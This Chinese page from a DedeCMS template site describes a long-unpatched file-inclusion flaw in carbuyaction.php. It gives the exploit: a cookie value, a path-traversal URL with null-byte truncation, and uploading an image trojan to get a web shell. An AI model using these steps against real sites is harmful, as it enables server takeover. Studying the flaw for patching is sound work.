织梦模板大全为站长朋友们提供精品织梦模板下载和免费织梦建站教程学习。
用户名:
密码:
注册

DedeCMS帮助中心

DedeCMS漏洞文件carbuyaction.php
本站承接DedeCMS仿站服务,大家如有需要请联系QQ:121673232
本站所有商业模板均提供使用详细安装说明(含视频)

织梦漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell

详细说明:漏洞文件carbuyaction.php

本地试了一下,最新DedeCMS版本一样可行。
首先利用cookie修改工具,加上 code=alipay 然后访问
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
直接包含成功
利用条件为GPC OFF ,或者某些环境下的截断。
可以在会员中心里上传个图片木马进行拿shell。
还可以包含dede自身文件进行更多利用,这里就不详细了。